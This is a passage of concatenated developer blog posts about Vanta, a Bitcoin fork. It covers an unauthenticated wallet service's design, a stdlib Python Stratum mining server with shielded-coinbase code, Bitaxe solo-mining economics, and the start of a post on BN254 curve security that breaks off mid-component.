The Bitcoin Core devs are aware of this footgun and there's been talk of a `fallbackfee` config that fires automatically. For now, a one-line workaround at every RPC client's startup.

## Auth, or the lack thereof

The Axum wallet binds to `0.0.0.0:8085` and runs `CorsLayer::permissive()`. Translation: anyone on the network can hit it. There's no token, no password, no rate limit.

This is fine **for what it is** — a single-operator tool you run on a host you control, with the assumption that the only consumer is the static page bundled into the same binary. It is not fine for a multi-tenant deployment. The host firewall is the auth boundary. If you put this on the open internet you've made a mistake.

The desktop app fixes this by running the equivalent logic in-process via Tauri IPC — there is *no* HTTP listener, so there's nothing for a browser tab on a malicious site to talk to. Read [The vanta sidecar architecture](/blog/vanta_sidecar_architecture/) and [Vanta Desktop](/blog/vanta_desktop_tauri_wallet/) for the longer story on that boundary.

## What the API doesn't have, and where it goes

The Axum wallet was written *before* the privacy layer was wired in. So it shows transparent UTXOs only. That's why the wallet-ui split exists: there's a [`wallet-ui/`](https://github.com/Dax911/vanta/tree/main/wallet-ui) React app that calls *both* the Axum service and `vanta-node`'s REST API, and renders a unified view that interleaves transparent transactions with shielded notes.

The 2026-04-17 commit message that motivated this whole post —

> wallet-ui: merge privacy view into unified dashboard + rescan endpoint

— is what landed when we collapsed the previously-separate `/privacy` page into the `/dashboard` page so users see *one* balance ("private balance") and *one* feed of activity. Behind the scenes the dashboard is calling:

- `GET /api/info` against the Axum wallet for L1 status (block count, connection count)
- `GET /status` against `vanta-node` for the L2 status (commitment count, nullifier count, SMT root)
- `GET /notes` against `vanta-node` for the wallet's shielded note inventory
- `POST /api/sync` (the new rescan endpoint) to trigger a re-scan of L1 + L2 against the wallet's keys

The unified-dashboard logic lives in [`wallet-ui/src/pages/dashboard.tsx`](https://github.com/Dax911/vanta/blob/main/wallet-ui/src/pages/dashboard.tsx). The L2 status card is a five-second auto-refresh that pulls SMT root, commitment count, nullifier count, and last block height, and renders it as four monospace numbers under the "L2 Privacy Layer" header. That's the surface a user sees; behind it are two Rust services and a C++ node.

## Why a separate service instead of merging into vanta-node

A reasonable design question: why does `wallet/` exist at all? Why isn't this one of `vanta-node`'s API endpoints?

Two reasons.

**Bitcoin-RPC stays as the wallet boundary.** The set of operations the L1 wallet does (send, receive, balance) maps 1:1 to Bitcoin Core RPC calls. Wrapping those in a small Axum service means the service is *replaceable* by anything that speaks the same five endpoints — a CLI, a different language wallet, a hardware-wallet integration. That'd be harder if the L1 wallet primitives were tangled into the L2 sidecar's REST API.

**`vanta-node` runs without a wallet.** A node operator who wants to index the chain but doesn't have a wallet on the node — say, a cold-storage setup or an indexer service — should be able to run `vanta-node` cleanly without a transparent-wallet listener implicitly bound. Keeping them separate means each service does one job.

The desktop app is the unified frontend that talks to both. The web wallet is the developer/debug frontend that talks to the L1 service. In the medium term I expect the web wallet to be deprecated in favour of "you run the desktop app" — but the Axum service is staying for as long as anyone wants a portable HTTP-shaped wallet.

## What I would do differently

Three things.

1. **Bind to 127.0.0.1 by default.** The current `0.0.0.0:8085` is a footgun for someone who runs this in a non-trusted network without thinking about firewalls. Default to localhost; the user can opt-in to LAN exposure with a flag.
2. **Drop `bitcoincore-rpc` for hand-rolled `reqwest`.** The crate is fine but I have hit type-mismatch issues every time `vantad` returns a slightly off-vanilla shape (e.g. our extra `value_balance` field on transactions). Going hand-rolled lets the wallet evolve with the chain without the upstream crate's maintainer in the loop.
3. **Type the receive endpoint against bech32.** Right now `getnewaddress` defaults to whatever the node is configured for (legacy `Z` or bech32 `vnt1`). The wallet should pass `bech32` explicitly so the address format the user sees is consistent.

None of these are urgent. The Axum wallet does its job. It's not the wallet I want to ship to a million users. It is the wallet I want behind the wallet I ship to a million users — a debug surface for me, when something is wrong with the chain and I want to talk to it from `curl`.

## Further reading

- [`wallet/src/main.rs`](https://github.com/Dax911/vanta/blob/main/wallet/src/main.rs) — the entire Axum service, 250 lines
- [`wallet/Cargo.toml`](https://github.com/Dax911/vanta/blob/main/wallet/Cargo.toml) — the dependency tree (small on purpose)
- [`wallet-ui/src/pages/dashboard.tsx`](https://github.com/Dax911/vanta/blob/main/wallet-ui/src/pages/dashboard.tsx) — the React dashboard that calls this service
- [Vanta Desktop: a Tauri wallet that ships its own full node](/blog/vanta_desktop_tauri_wallet/) — what replaces this for end users
- [The vanta sidecar architecture](/blog/vanta_sidecar_architecture/) — how `vanta-node` complements this service
- [Bitcoin Core JSON-RPC docs](https://bitcoincore.org/en/doc/27.0.0/) — the upstream contract the Axum service wraps


---

# Stratum v1, the from-scratch Python version

Canonical: https://blog.skill-issue.dev/blog/vanta_stratum_python_pool/
Description: Solo mining Vanta requires a Stratum server. Public-pool is fine for normal chains; mandatory privacy pushes the pool toward shielded coinbases, encrypted-note submission, and an L2 retry queue. pool/stratum_server.py does it all in stdlib Python.
Published: 2026-04-13T17:34:24.000Z
Tags: vanta, mining, stratum, python, bitaxe, privacy


I wrote about [mining VANTA with a Bitaxe BM1368](/blog/mining_vanta_with_a_bitaxe/) — the hardware, the watts, the difficulty math, why solo mining a privacy fork actually pays off where solo mining Bitcoin in 2026 doesn't. This post is the deeper companion: what the Python Stratum server *does* once you've decided to write one from scratch, and why the privacy chain forced a few changes that wouldn't be required on a vanilla Bitcoin fork.

The whole server is one file: [`pool/stratum_server.py`](https://github.com/Dax911/vanta/blob/main/pool/stratum_server.py). No external dependencies — pure stdlib Python. Around 600 lines. Every line earns its place; this isn't an optimised pool, it's a *correct* pool that I can debug from a terminal at 4 AM.

## Why Python at all

A reasonable thing to ask: "you're shipping Rust everywhere else, why is the pool Python?"

Three reasons.

1. **Stratum v1 is a 200-line protocol.** It's JSON over a long-lived TCP connection. `socketserver.ThreadingTCPServer` is exactly the right shape: one thread per connected miner, blocking I/O, no async machinery to argue about.
2. **The interesting work is talking to `vantad` over JSON-RPC and to the L2 sidecar over REST.** Both are HTTP-shaped. `http.client` and `urllib.request` are stdlib. Zero dependency surface.
3. **I can edit the running pool.** When you're debugging a chain at 4 AM and your Bitaxe disconnected, "edit the script and restart" is a faster path than "edit the Rust, recompile, redeploy, kill and restart." Python wins on the iteration loop.

The full upstream story is that Vanta originally used a public-pool fork (Node.js) and the Python server is the *replacement* I wrote when the public-pool fork couldn't handle the privacy-coinbase requirements. That's the part the rest of this post is about.

## Mandatory privacy mining

Vanta v2 chain consensus rejects any non-coinbase transaction that doesn't satisfy the witness-v2 commitment-binding rules. **Coinbase transactions are also required to be witness v2.** From the top of the Stratum server:

```python
SHIELDED_PUBKEY = os.environ.get("SHIELDED_PUBKEY", "").strip()
if not SHIELDED_PUBKEY or len(SHIELDED_PUBKEY) != 64:
    print("[FATAL] SHIELDED_PUBKEY env var is required (32-byte hex, 64 chars).", file=sys.stderr)
    print("        Vanta v2 chain has no transparent mining payouts.", file=sys.stderr)
    sys.exit(1)
```

The pool refuses to start without a shielded pubkey. There is no transparent fallback. A miner who points a Bitaxe at this server is paying out into a shielded note from block one.

The note-construction code is also worth quoting because it pinned down the on-chain format we ended up shipping:

```python
def create_mining_note(value: int, owner_pubkey: bytes) -> tuple:
    """Create a private note for auto-shielded mining reward.
    Returns (commitment_hash, randomness)."""
    randomness = os.urandom(32)
    preimage = (
        struct.pack('<Q', value) +      # 8 bytes LE
        owner_pubkey +                    # 32 bytes
        struct.pack('<I', 0) +            # asset_type = 0 (native VANTA)
        randomness                        # 32 bytes
    )
    commitment = hash_with_domain(b"Vanta/NoteCommitment/v1", preimage)
    return commitment, randomness
```

This is *exactly* the commitment scheme `vanta-core` uses on the Rust side. The pool is hashing in Python because the pool is the thing that knows the value (the block subsidy) at coinbase-construction time. The wallet later trial-decrypts the encrypted-note submission and sees the same commitment land in its inbox.

`witness_v2_script` builds the scriptPubKey:

```python
def witness_v2_script(commitment_hash: bytes) -> bytes:
    """Build witness v2 scriptPubKey: OP_2 PUSH32 <commitment>."""
    return bytes([0x52, 0x20]) + commitment_hash
```

`OP_2 PUSH32 <commitment>` is the witness-v2 anchor format; the C++ consensus code parses this exactly and uses the pushed 32 bytes as the input commitment when a future spend witness comes through. From the chain's perspective, the coinbase pays into "this commitment" and the value field on the transaction is zero. The pool also adds an OP_RETURN anchor for L2 indexers to find:

```python
def commitment_anchor_script(commitment_hash: bytes) -> bytes:
    """Build OP_RETURN anchor: OP_RETURN PUSH34 bb00 <commitment>."""
    payload = bytes([0xbb, 0x00]) + commitment_hash  # 34 bytes
    return bytes([0x6a]) + encode_varint(len(payload)) + payload
```

`OP_RETURN 0xbb 0x00 <commitment>` is the indexer-side anchor; `vanta-node`'s L1 watcher scans for this byte sequence and feeds matches into the SMT.

## Solo-mining accounting vs pool accounting

Public pools track per-miner shares and pay out at end-of-round based on share contributions. The math is non-trivial: PPLNS, FPPS, score-based, etc. A solo pool doesn't need any of that. Whoever finds the block keeps the whole reward. The Stratum server has miners, but the only thing it does with their share-count is *monitoring*, not accounting.

This simplification is huge. There's no payout database, no end-of-round settlement, no fee policy, no withdrawal endpoint. The pool's only persistent state is:

1. The pending-L2-submission queue (`pending_l2_submissions.json`).
2. Optionally the local note backup (`SHIELDED_NOTES_FILE`, off by default).

Both are JSON files. The pool can be killed, restarted, even moved between machines, and the only state that matters is the on-chain commitment + the L2 sidecar's encrypted-note inbox. The pool host isn't the source of truth for anything user-visible.

This is *exactly* how a solo-mining server should work. The complexity of a public-pool comes from settling between multiple miners. A solo-pool inherits none of that.

## The L2 retry queue

This is the thing that ate a week to get right. The flow:

1. Bitaxe submits a share that meets block difficulty.
2. Pool calls `submitblock` against `vantad`.
3. `vantad` accepts the block.
4. Pool generates the encrypted note for the miner's reward.
5. Pool POSTs the encrypted note to `vanta-node`'s `/submit` endpoint.

What if step 5 fails? The L2 sidecar might be restarting, network might be flaky, sidecar might be slow under load. We can't lose the encrypted note — without it, the miner's wallet can't discover the reward.

The first version retried in-process, blocking the share-acceptance loop. Bad idea: a slow L2 stalls the whole pool.

The second version queued the failed submission to a file and a background thread retried every 30 seconds:

```python
def _retry_worker():
    """Background worker — drains the L2 retry queue every 30 seconds."""
    while True:
        try:
            drain_pending_l2_queue()
        except Exception as e:
            print(f"[SHIELD] retry worker error: {e}")
        time.sleep(30)
```

This is the version that shipped. Failed submissions go to `pending_l2_submissions.json`, get retried until accepted, get removed from the queue. The pool host can be restarted and the queue persists.

A subtle detail: this is called *only* on `submitblock` accept, not on every Stratum job-template push. From the comment in `save_shielded_note`:

```python
"""Persist mining note and submit encrypted note to L2 for wallet discovery.

Called ONLY after a winning block is accepted by submitblock — never from
the per-share job-template path, otherwise the L2 SMT fills up with phantom
commitments for templates that never won the PoW race.
"""
```

The first version called this from the job-template path, which is the path that runs every time the pool decides to push fresh work to its connected miners. With a 1-minute block time and longpoll discipline, that's roughly every 1–2 seconds. So the L2 SMT was getting hundreds of phantom commitments per actual block, all for blocks that never won the PoW race. That bug shipped to a testnet for about 6 hours before I noticed; the cleanup involved replaying the L2 from genesis with the fix applied. Don't put non-idempotent side effects in your job-template path.

## Encrypted-note construction

The `encrypt_note_for_recipient` function is the bit that lets a miner's wallet *find* its reward without the chain leaking what was paid:

```python
def encrypt_note_for_recipient(recipient_pubkey: bytes, value: int, asset_type: int,
                                randomness: bytes, commitment: bytes) -> dict:
    """Encrypt note data so the recipient can discover it via L2 sync.
    Matches vanta-core encrypt.rs exactly: domain-separated SHA256 + XOR stream."""
    ephemeral_secret = os.urandom(32)
    ephemeral_pubkey = hash_with_domain(b"Vanta/Ephemeral/v1", ephemeral_secret)
    shared_secret = hash_with_domain(b"Vanta/SharedSecret/v1", ephemeral_pubkey + recipient_pubkey)
    plaintext = struct.pack('<Q', value) + struct.pack('<I', asset_type) + randomness
    ciphertext = bytearray()
    for block_idx in range((len(plaintext) + 31) // 32):
        stream_input = shared_secret + struct.pack('<I', block_idx)
        keystream = hash_with_domain(b"Vanta/Stream/v1", stream_input)
        chunk = plaintext[block_idx * 32 : (block_idx + 1) * 32]
        for i, b in enumerate(chunk):
            ciphertext.append(b ^ keystream[i])
    return {
        "ephemeral_pubkey": list(ephemeral_pubkey),
        "ciphertext": list(ciphertext),
        "commitment": list(commitment),
    }
```

This is a hand-rolled XOR-stream cipher with domain-separated SHA-256 as the keystream generator. The comment notes "matches vanta-core encrypt.rs exactly" — the Rust side of the protocol does the same thing, so the wallet trial-decrypts in Rust against the Python-encrypted notes from the pool and they line up.

A note on this scheme that an auditor would (rightly) flag: a hand-rolled XOR stream cipher with SHA-256 as the keystream generator is *fine* for this use case (small, fixed-length plaintexts, ephemeral keys, no nonce reuse risk because every note has fresh randomness) but it is the kind of cryptographic choice you have to defend in a post-mortem. The papers' [Executive Summary](https://github.com/Dax911/vanta/blob/main/papers/01-executive-summary.md) mentions that the encryption layer for general transfers is XChaCha20-Poly1305 — for the *coinbase auto-shield* the Stratum server uses this lighter scheme because the value, asset_type, and randomness are all already domain-separated by the broader commitment construction. **TODO: Dax confirm we want to align the coinbase encryption scheme with the general-transfer XChaCha20 path before mainnet calcification.**

## Longpoll discipline

The other thing the Stratum server has to get right is *fresh work*. With 1-minute block times, a miner that's still hashing against last block's template is wasting effort. The pool polls `vantad` for `getblocktemplate` with a `longpollid`, blocks until either a new template is available or a timeout fires, then immediately pushes a new `mining.notify` to every connected miner.

The window from "new block found by someone else" to "all my Bitaxes have new work" is the metric I tune. With local RPC and longpoll, it's ~50ms. Worth the engineering — every wasted second of stale work is a measurable hashrate drop on the miner side.

## What I would do differently

1. **Go async Python.** The current threadpool pattern is fine for a handful of Bitaxes. If a public solo-pool ever grew to thousands of miners, threads would be the wrong choice. `asyncio` + `aiohttp` is the swap.
2. **Ship a CPU miner alongside.** I noted this in the [Bitaxe post](/blog/mining_vanta_with_a_bitaxe/). 200 lines of Rust. Should have done it day one.
3. **Health endpoint.** A `/health` HTTP route that returns the pool's view of itself: connected miners, last block found, current difficulty, retry queue depth. Trivial; on the list.
4. **Move the encryption scheme to align with the rest of the chain.** As the TODO above.

## Further reading

- [`pool/stratum_server.py`](https://github.com/Dax911/vanta/blob/main/pool/stratum_server.py) — the entire server in one file
- [Mining VANTA with a Bitaxe BM1368](/blog/mining_vanta_with_a_bitaxe/) — sister post on the hardware side
- [The vanta sidecar architecture](/blog/vanta_sidecar_architecture/) — what `/submit` lands in
- [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — the chain the pool feeds blocks into
- [Stratum v1 protocol reference](https://reference.cash/protocol/network/stratum) — the wire format
- [`skot/bitaxe`](https://github.com/skot/bitaxe) — the open-hardware miner


---

# Mining VANTA with a Bitaxe BM1368

Canonical: https://blog.skill-issue.dev/blog/mining_vanta_with_a_bitaxe/
Description: A 350 GH/s, ~12 W open-hardware ASIC plugged into a Stratum server I wrote against my own L1. Solo mining isn't economic on Bitcoin in 2026. On a 1-minute-block fork with 100k subsidy, the math changes.
Published: 2026-04-15T18:00:00.000Z
Tags: vanta, mining, bitaxe, asic, stratum, hardware


There is a very specific feeling you only get when a small piece of hardware sitting on your desk solves a block on a chain *you wrote.* The first time it happened on Vanta — somewhere around 4 AM on a Tuesday — I had to stare at the explorer for a minute and confirm I wasn't hallucinating.

This post is the writeup of the mining stack: a [Bitaxe BM1368](https://github.com/skot/bitaxe) talking Stratum to a Python server I wrote against [`vantad`](https://github.com/Dax911/vanta) RPC, generating real blocks on a real chain that I am, transparently, the operator of. It's also a continuation of [What running a Bitcoin mine taught me about cloud margins](/blog/what_running_a_bitcoin_mine_taught_me/) — only this time the unit economics actually work.

## The hardware

The [Bitaxe BM1368](https://github.com/skot/bitaxe) is the open-hardware ASIC of choice for the solo-mining renaissance. The board is roughly the size of a deck of cards. It pulls about 12 watts at the wall. It hashes at ~350 GH/s — that's 350 *gigahashes* per second.

Compare that to my year at Foundry Digital: the Antminer S19 XPs we deployed by the rack pull ~3 kW each and hash at ~140 TH/s. So one XP is worth roughly *400 Bitaxes* in hashrate, at *250x the power draw.* The Bitaxe wins on watts-per-hash but loses on hash-per-dollar-of-capex by about an order of magnitude.

That trade is exactly why solo mining Bitcoin in 2026 is essentially a lottery. With current Bitcoin difficulty, a single Bitaxe expects to find a block once every several centuries. Most operators run them as conversation pieces, not as economic mining rigs.

On Vanta, the math changes.

## Vanta difficulty math

Vanta's chain parameters are deliberately tuned for small operators:

- **1-minute block time** (vs Bitcoin's 10 minutes)
- **Difficulty retarget every 60 blocks** (~1 hour, vs Bitcoin's 2016 blocks / ~2 weeks)
- **Total network hashrate, today: low**

The tight retarget loop means difficulty tracks live network hashrate within an hour. The low total hashrate means a single Bitaxe is a meaningful fraction of the network. As of writing this post — and this number changes every hour — my Bitaxe is finding ~1-2 blocks per day on Vanta. That's 100,000-200,000 VANTA per day flowing into a wallet, on a chain whose ZK-privacy properties I designed myself.

I am *deeply aware* of how this looks. It is the founder of an L1 chain talking about how easy it is to mine the chain he founded. So let me say the loud part: **this is the testnet phase.** As more miners join, my hashrate becomes a smaller fraction of the network, my expected blocks-per-day drops, the subsidy gets distributed more widely, and that is the point. The Bitaxe-friendly difficulty is a feature for the *first generation* of miners; it scales out gracefully as the network grows.

## The Stratum server

Bitaxes speak [Stratum v1](https://reference.cash/protocol/network/stratum) — the JSON-RPC over TCP protocol that's been around since the early Bitcoin days. They expect a Stratum *server* (often called a "pool") to send them work and accept their submitted shares.

I wrote one. It lives in [`pool/` of the vanta monorepo](https://github.com/Dax911/vanta/tree/main/pool). It's Python, not Rust, because Stratum is a 200-line protocol and the Python `socketserver` library is exactly what you want for "spawn a thread per connected miner, marshal JSON, talk to a local node over RPC."

The flow is:

```
       Bitaxe                    pool/server.py                vantad RPC
         │                              │                          │
         │── mining.subscribe ─────────►│                          │
         │◄────────── subscribe.result ─│                          │
         │── mining.authorize ─────────►│                          │
         │◄───────── authorize.result ──│                          │
         │                              │                          │
         │                              │─── getblocktemplate ────►│
         │                              │◄────── block template ───│
         │                              │                          │
         │◄────── mining.notify (job) ──│                          │
         │── mining.submit (share) ────►│                          │
         │                              │── submitblock (if win) ─►│
         │                              │◄──── block accepted ─────│
         │◄───────── submit.result ─────│                          │
```

Two things matter for a chain operator that don't matter for a public pool:

1. **Solo mining payouts.** This isn't a pool with multiple miners splitting rewards by share contribution. Every share that meets the *block* difficulty (not just the per-miner pool difficulty) is a block; the entire 100,000 VANTA subsidy goes to the miner's payout address. The Stratum server doesn't track shares for accounting — it tracks them for monitoring.
2. **Block-template freshness.** With 1-minute blocks, a stale block template means you're hashing against a block that's already mined. The server polls `vantad` for `longpollid` changes and pushes a new `mining.notify` to all connected miners within ~50 ms of a new block landing. Miss that window and your effective hashrate drops.

The second one is the actual engineering work. Naive implementations push templates every 30 seconds and waste 50% of the miner's effort on stale work. The longpoll-aware version is in `pool/server.py:handle_longpoll()` if you want to see it.

## Wattage, heat, and noise

People who haven't lived with mining hardware always ask about the noise.

Stock Bitaxe BM1368: ~50 dB at 12 W. About as loud as a desktop PC under load. Sits on my desk next to the keyboard. Doesn't bother me.

A *rack* of 12 Bitaxes (which is roughly equivalent to one S19 XP in hashrate, at less wattage) is louder. ~70 dB. Tolerable in a closet, not in a living room.

A *rack of S19 XPs* — what I worked with at Foundry — is 90+ dB and audible from the next building. You don't put those in a home. You put those in a converted natural-gas plant in West Texas with chillers and earplugs.

The Bitaxe-on-the-desk solo-mining experience is *fundamentally different* from industrial mining. It's the difference between owning a model train and working at Union Pacific.

## What this is for

The chain doesn't need this hardware to function. The pool/Bitaxe rig is there because:

1. **Bootstrap difficulty.** Without a baseline of hashrate, the chain's difficulty drops to the floor and you get blocks every few seconds, which is bad for finality. The Bitaxe holds difficulty at a reasonable level.
2. **Live testnet activity.** Every block I mine is a real block with real ZK proof verification, real witness-v2 binding, real SMT root commitment. It exercises the entire stack continuously.
3. **The story.** "We forked Bitcoin and we're solo-mining it on a Bitaxe" is a sentence that makes other engineers lean in at conferences. The chain is real because it's *physically real* on hardware you can buy on Tindie.

When the chain has more participants than my desk, the Bitaxe stays — but it stops being load-bearing. That's the goal.

## What I would do differently

Three things, all small:

1. **Ship a CPU miner alongside the Stratum server.** The Bitaxe is delightful but it's not a *requirement*. A CPU miner that does 10 MH/s on a laptop is plenty for testnet. I should have shipped that in week one. It's a 200-line Rust program; I'll write it.
2. **Per-miner difficulty in Stratum.** Right now every Bitaxe gets the network difficulty as the share difficulty, which is fine for solo mining but inflates the share-rejection rate. A vardiff implementation would smooth out the metrics. Low priority since the operational consequence is zero.
3. **Better UI for "blocks I mined."** I currently grep `vantad`'s logs. The web wallet should have a "blocks mined" tab that pulls coinbase transactions where the recipient is a wallet-owned address. Two-day project, on the list.

## Further reading

- [`Dax911/vanta/pool/`](https://github.com/Dax911/vanta/tree/main/pool) — the Stratum server source
- [`skot/bitaxe`](https://github.com/skot/bitaxe) — Bitaxe open-hardware reference
- [`Dax911/vanta`](https://github.com/Dax911/vanta) — the chain itself
- [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — what's actually in the chain
- [L1 nullifier sets: enforcing no-double-spend at consensus](/blog/vanta_l1_nullifier_set/) — sister post on the proof-binding side
- [What running a Bitcoin mine taught me about cloud margins](/blog/what_running_a_bitcoin_mine_taught_me/) — the Foundry chapter
- Stratum v1 protocol reference at [reference.cash](https://reference.cash/protocol/network/stratum)


---

# Why BN254, and when to switch off it

Canonical: https://blog.skill-issue.dev/blog/why_bn254_and_when_to_switch/
Description: BN254 is the default curve for production ZK in 2026. The 128-bit security claim is no longer 128 bits, and BLS12-381 is gaining ground. Here is the math, the deployment reality, and the migration path.
Published: 2026-04-15T17:00:00.000Z
Tags: cryptography, bn254, bls12-381, pairings, zk, phd, math


import { Mermaid, Sandbox, TradeoffTable, Aside, Quote, RustPlayground } from "@/components/mdx";

Every production ZK system you can name in 2026 — Zcash Sapling, Aleo, Mina, Filecoin's PoRep, Solana's `alt_bn128_*` syscalls, the Ethereum precompile at `0x06`/`0x07`/`0x08`, [zera-sdk](/blog/zera_sdk_scaffolding/) — runs Groth16 over the same curve. **BN254**. A Barreto–Naehrig curve with a 254-bit base field, embedding degree 12, and a pairing that has been the default in pairing-based cryptography for nearly two decades.

It is also the curve that has lost the most bits of advertised security in the last ten years.

This post is the long answer to two questions that come up in every cryptography review I run with a serious team: *why is BN254 still the default in 2026*, and *when do we get off it*.

<Aside kind="note">
This is a working post in my [PhD-by-publication track](/about). The arithmetic is checked against [Barbulescu and Duquesne (2019)](https://eprint.iacr.org/2017/334) for the security level estimates and the [IETF CFRG pairing-friendly curves draft](https://datatracker.ietf.org/doc/draft-irtf-cfrg-pairing-friendly-curves/) for the standardisation status.
</Aside>

## The minimum cryptography you need

A pairing is a bilinear map

$$
e : \mathbb{G}_1 \times \mathbb{G}_2 \to \mathbb{G}_T
$$

with $\mathbb{G}_1, \mathbb{G}_2$ cyclic groups of prime order $r$ on an elliptic curve $E$, and $\mathbb{G}_T$ a multiplicative subgroup of an extension field $\mathbb{F}_{p^k}$. *Bilinear* means

$$
e(a P, b Q) = e(P, Q)^{ab}
$$

for any $a, b \in \mathbb{Z}_r$ and generators $P, Q$. That single equation is the entire reason pairing-based cryptography exists — it lets you "multiply in the exponent" across two different groups, which is exactly what Groth16's verification equation needs.

Two parameters drive everything. **The embedding degree $k$** is the smallest integer with $r \mid p^k - 1$; it sets the size of the target field $\mathbb{F}_{p^k}$. **The base field characteristic $p$** sets the cost of every operation in $\mathbb{G}_1$. The security of the pairing rests on:

- The discrete log problem (DLP) in $\mathbb{G}_1$ and $\mathbb{G}_2$ — protected by Pollard's rho, cost $\sqrt{r}$, so we want $r \approx 2^{256}$ for 128-bit security.
- The DLP in $\mathbb{F}_{p^k}^*$ — protected by the **number field sieve**, cost subexponential in $p^k$, so we want $p^k$ large enough that NFS is no easier than $\sqrt{r}$.

The trick of pairing-friendly curve design is to find $(p, r, k)$ where both DLPs are hard *and* $p$ is small enough that field operations don't dominate. BN curves use the parameterisation

$$
p(t) = 36 t^4 + 36 t^3 + 24 t^2 + 6 t + 1,
$$
$$
r(t) = 36 t^4 + 36 t^3 + 18 t^2 + 6 t + 1,
$$

with $E: y^2 = x^3 + 3$ defined over $\mathbb{F}_p$ and embedding degree $k = 12$. Pick $t$ such that $p$ and $r$ are both prime, and you get a curve. BN254 is the choice $t = 4965661367192848881$ — an integer carefully chosen so $p$ has 254 bits and $r$ has 254 bits, and so the resulting field arithmetic is reasonably efficient.

## Where the 128 bits went

When BN254 was deployed in 2010-2015, the security argument was: $p^{12} \approx 2^{3048}$, the NFS algorithm at the time required $\approx 2^{128}$ field operations to break the DLP in $\mathbb{F}_{p^{12}}^*$, and Pollard's rho on $\mathbb{G}_1$ required $\approx 2^{127}$. Both legs landed at 128-bit security. Done.

Then [Kim and Barbulescu (2016)](https://eprint.iacr.org/2015/1027) introduced **exTNFS**, an extended Tower NFS variant that exploits the structure of $\mathbb{F}_{p^k}$ when $k$ has a non-trivial factorisation (which $k = 12 = 4 \cdot 3$ does). The complexity of NFS dropped, and the [Barbulescu-Duquesne (2019) update](https://eprint.iacr.org/2017/334) re-estimated the security of BN254 at **roughly 100-110 bits** — depending on which constant in the NFS asymptotic you trust.

That is the gap. The curve is not broken. The pairing still works. But "BN254 = 128-bit security" was the marketing line, and after 2016 it should have been "BN254 ≈ 100 bits."

The honest table:

<TradeoffTable
  rows={[
    {
      option: "BN254",
      cost: "~254-bit base field; cheapest pairing in production",
      latency: "Best verifier perf; ~3ms Groth16 verify on Solana",
      blast_radius: "~100-110 bits actual security after exTNFS",
      notes: "Default in Ethereum precompile, Solana, Zcash Sprout, zera-sdk. Fine for 2026; not a forever choice."
    },
    {
      option: "BLS12-381",
      cost: "~381-bit base field; ~50% slower pairings",
      latency: "Verifier ~5-7ms typical",
      blast_radius: "~120-126 bits actual security",
      notes: "Ethereum 2.0 BLS signatures, Zcash Sapling, Filecoin. The realistic upgrade target."
    },
    {
      option: "BLS12-446",
      cost: "~446-bit base field; ~80% slower than BN254",
      latency: "Verifier ~7-9ms",
      blast_radius: "~128 bits with margin",
      notes: "Theoretically clean 128-bit choice; minimal deployment as of 2026."
    },
    {
      option: "BLS24-509",
      cost: "Larger base, embedding degree 24, very fast G_T arithmetic",
      latency: "Verifier ~6-8ms",
      blast_radius: "~128 bits, more conservative NFS margin",
      notes: "Niche; competes with BLS12-381 on perf, more on paper than in production."
    },
    {
      option: "Post-quantum (lattice / hash / code)",
      cost: "No pairings; structurally different",
      latency: "STARK-style verification, larger proofs",
      blast_radius: "Quantum-secure (still active research)",
      notes: "When pairing-based cryptography retires, this is what replaces it. Not 2026, probably 2030+."
    },
  ]}
/>

The blast-radius column is the load-bearing one. **BN254 is not broken in 2026.** A 100-bit security level still costs an attacker $\sim 2^{100}$ field operations, which is not within the budget of any actor we model. But it is also not a curve you start a fresh decade-long deployment on.

## The migration hierarchy

The pairing-friendly curve landscape, drawn as a hierarchy of "what would I deploy next":

<Mermaid chart={`flowchart TD
  BN254[BN254 — current default, ~100-110 bit security after exTNFS] --> BLS381[BLS12-381 — ~120-126 bit, Ethereum/Filecoin/Sapling]
  BLS381 --> BLS446[BLS12-446 — clean ~128 bit with margin]
  BLS381 --> BLS24[BLS24-509 — embedding degree 24, niche]
  BLS446 --> PQ[Post-quantum candidates: lattice (Falcon/Dilithium), STARK-based]
  BLS24 --> PQ
  BN254 -.-> PQ
  classDef now fill:#1a1a1a,stroke:#4ade80,color:#4ade80
  classDef next fill:#1a1a1a,stroke:#a3a3a3,color:#e8e8e8
  classDef long fill:#1a1a1a,stroke:#737373,color:#a3a3a3
  class BN254 now
  class BLS381,BLS446,BLS24 next
  class PQ long`}/>

The bottom row is what kills pairing-based cryptography eventually. Shor's algorithm runs in polynomial time on a sufficiently large quantum computer, the discrete log breaks, and every curve in the diagram above goes to zero overnight. The realistic time horizon for that is *not 2026* — the largest credible quantum factorisation as of last year is still toy-scale — but it is the reason you build a hash function migration story into your protocol from day one. We did this in [zera-sdk](/blog/zera_sdk_scaffolding/) by isolating the curve choice to a single `crates/zera-sdk-core/src/curve.rs` module. A future migration to BLS12-381 is one type alias and a regenerated `.zkey`. A migration to a lattice-based scheme is a bigger lift but the seam is clean.

## Why the IETF still hasn't picked one

The IETF CFRG has been running a pairing-friendly curves working group since 2018. As of [draft 11](https://datatracker.ietf.org/doc/draft-irtf-cfrg-pairing-friendly-curves/), the recommendation lists **BLS12-381 and BN462** as the two curves with 128-bit security after exTNFS. BN254 is explicitly *not* recommended for new deployments — the draft notes:

<Quote cite="https://datatracker.ietf.org/doc/draft-irtf-cfrg-pairing-friendly-curves/" author="IETF CFRG, pairing-friendly-curves draft">
The BN curves with smaller parameters such as BN254 should not be used for applications requiring 128-bit security level due to the recent improvements of the number field sieve algorithm. Implementations targeting the 128-bit security level SHOULD use BLS12-381 or BN462.
</Quote>

The reason BN254 is still the production default in 2026 despite this is one part path-dependence (the Ethereum precompile is BN254 and rewriting that is a hard fork) and one part cost (BLS12-381 is roughly 50% slower per pairing and 50% larger per group element). For a privacy pool that is already paying tens of milliseconds per proof, the trade-off is real.

The clean argument: BN254 today, BLS12-381 next, lattice-based when the quantum threat becomes credible. That ordering is what every serious protocol designer I've talked to in the last year converges on.

## Pairing arithmetic, by hand

The pairing itself is a Miller-loop algorithm followed by a final exponentiation. It is unreasonable to derive in a blog post — go read [Barreto, Galbraith, Ó hÉigeartaigh, Scott (2007)](https://eprint.iacr.org/2007/077) for the optimal-Ate construction — but the *bilinearity check* is one line and worth seeing:

$$
e([a]P, [b]Q) = e(P, Q)^{ab}
$$

The toy below verifies this property over a tiny pairing-friendly toy curve. It uses a synthetic group and a synthetic pairing — *not* BN254, because computing a real BN254 pairing in 60 lines of TypeScript is not honest pedagogy. The shape of the relations is real. The numbers are not.

<Sandbox
  template="vanilla-ts"
  files={{
